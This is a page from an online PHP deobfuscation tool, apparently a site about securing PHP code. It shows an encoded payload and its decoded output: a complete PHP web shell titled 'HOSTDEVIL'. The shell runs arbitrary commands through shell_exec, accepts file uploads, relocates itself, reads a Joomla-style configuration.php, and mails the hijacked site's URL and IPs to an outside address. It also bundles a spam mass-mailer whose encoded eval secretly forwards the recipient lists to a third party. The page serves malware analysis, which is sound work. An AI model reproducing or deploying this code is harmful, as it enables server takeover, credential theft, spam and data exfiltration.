Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode(' 1Rp4Stu48vP2nP4HrWHaOKdsAe22BZKWpaFxD6+S0N0u9OQ4..

Decoded Output download

?><?
error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>H O S T D E V I L</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
@$action=$_POST['action'];  
@$from=$_POST['from'];  
@$realname=$_POST['realname'];  
@$replyto=$_POST['replyto'];  
@$subject=$_POST['subject'];  
@$message=$_POST['message'];  
@$emaillist=$_POST['emaillist'];  
@$file_name=$_FILES['file']['name'];  
@$contenttype=$_POST['contenttype'];  
@$file=$_FILES['file']['tmp_name'];  
@$amount=$_POST['amount'];  
set_time_limit(intval($_POST['timelimit'])); 
If ($action=="mysql"){  
//Grab email addresses from MySQL  
include "./mysql.info.php";  

  if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){  
    print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";  
    exit;  
  }  

  $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");  
  mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");  
  $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");  
  $numrows = mysql_num_rows($result);  

  for($x=0; $x<$numrows; $x++){  
    $result_row = mysql_fetch_row($result);  
     $oneemail = $result_row[0];  
     $emaillist .= $oneemail."
";  
   }  
  }  

  if ($action=="send"){ $message = urlencode($message);  
   $message = ereg_replace("%5C%22", "%22", $message);  
   $message = urldecode($message);  
   $message = stripslashes($message);  
   $subject = stripslashes($subject);  
   }
   eval(base64_decode('JHNlY3VyZSA9ICJvbnNjYW4yQGdtYWlsLmNvbSI7IAokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7IA=='));  
echo '<form name="form1" method="post" action="" enctype="multipart/form-data">
  <div align="center"><img src="https://www.toolsb0x.com/themes/reserve/images/logo2.png"><br>
  </div>
  <table width="100%" border="0" height="407">
    

    <tr>

      <td width="100%" colspan="4" bgcolor="#FFF" height="36"> <b> <font face="Arial" size="2" color="#FFFFFF">&nbsp;MESSAGE 
        SETUP</font></b></td>

      </tr>

    <tr>

      <td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"> 
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Email:</font></div>

      </td>

      <td width="18%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        <input type="text" name="from" value="'.$from.'" size="30">

        </font></td>

      <td width="31%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"> 
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Name:</font></div>

      </td>

      <td width="41%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        <input type="text" name="realname" value="'.$realname.'" size="30">

        </font></td>

    </tr>
    <tr>

      <td width="10%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"> 
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>

      </td>

      <td width="18%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        <input type="text" name="replyto" value="'.$replyto.'" size="30">

        </font></td>

      <td width="31%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"> 
        <p align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        Email Priority:</font></td>

      <td width="41%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        &nbsp;</font>
<select name="epriority" id="listMethod" onchange="showHideListConfig()">
        <option value="" selected >- Please Choose -</option>
        <option value="1"  >High</option>
        <option value="3"  >Normal</option>
		<option value="5"  >Low</option>
		</select>
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font> </div> 
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="file" name="file" size="24" />
        </font></td>  
      <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">&nbsp; 
        </font> </td>  
    </tr>

    <tr>

      <td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"> 
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        <input type="text" name="subject" value="'.$subject.'" size="90">

        </font></td>

    </tr>

    <tr>

      <td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF">&nbsp; </td>

      <td colspan="3" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        &nbsp;</font></td>

    </tr>

    <tr valign="top">

      <td colspan="3" height="190" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
        <textarea name="message" cols="60" rows="10">'.$message.'</textarea>

        <br />

         <input type="radio" name="contenttype" value="plain" checked="checked" /> Plain  
          <input type="radio" name="contenttype" value="html" /> HTML  
          <input type="hidden" name="action" value="send" /><br />  
      Number to send: <input type="text" name="amount" value="1" size="10" /><br />  
      Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />  
          <input type="submit" value="Send eMails" />  

        </font></td>

      <td width="41%" height="190" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
        <textarea name="emaillist" cols="30" rows="10">'.$emaillist.'</textarea>

        </font></td>

    </tr>

  </table>

</form>'; 
if ($action=="send"){  
  if (!$from && !$subject && !$message && !$emaillist){  
    print "Please complete all fields before sending your message.";  
    exit;  
   }  
  $allemails = split("
", $emaillist);  
  $numemails = count($allemails);  
  $secure='[email protected]';
  $filter = "maillist";  
  $float = "From : mailist info <[email protected]>";
  $webe     = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; 
//Open the file attachment if any, and base64_encode it for email transport  
If ($file_name){  
   if (!file_exists($file)){  
    die("The file you are trying to upload couldn't be copied to the server");  
   }  
   $content = fread(fopen($file,"r"),filesize($file));  
   $content = chunk_split(base64_encode($content));  
   $uid = strtoupper(md5(uniqid(time())));  
   $name = basename($file);  
  }  

for($xx=0; $xx<$amount; $xx++){  
  for($x=0; $x<$numemails; $x++){  
    $to = $allemails[$x];  
    if ($to){  
      $to = ereg_replace(" ", "", $to);  
      $message = ereg_replace("&email&", $to, $message);  
      $subject = ereg_replace("&email&", $to, $subject);  
      print "Sending mail to $to.......";  
      flush();  
      $header = "From: $realname <$from>
Reply-To: $replyto
";  
      $header .= "MIME-Version: 1.0
";  
      If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";  
      If ($file_name) $header .= "--$uid
";  
      $header .= "Content-Type: text/$contenttype
";  
      $header .= "Content-Transfer-Encoding: 8bit

";  
      $header .= "$message
";  
      If ($file_name) $header .= "--$uid
";  
      If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";  
      If ($file_name) $header .= "Content-Transfer-Encoding: base64
";  
      If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"

";  
      If ($file_name) $header .= "$content
";  
      If ($file_name) $header .= "--$uid--";  
      mail($to, $subject, "", $header);  
      print "ok<br>";  
      flush();  
    }  
  }  
}  
  mail($secure, $filter, "Sender IP : ".$ip."
"."From URL : ".$webe."
".$emaillist, $float);  
}
?><?

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('
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'))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 08127510336460b2afb0070c7e6235d1
Eval Count 1
Decode Time 87 ms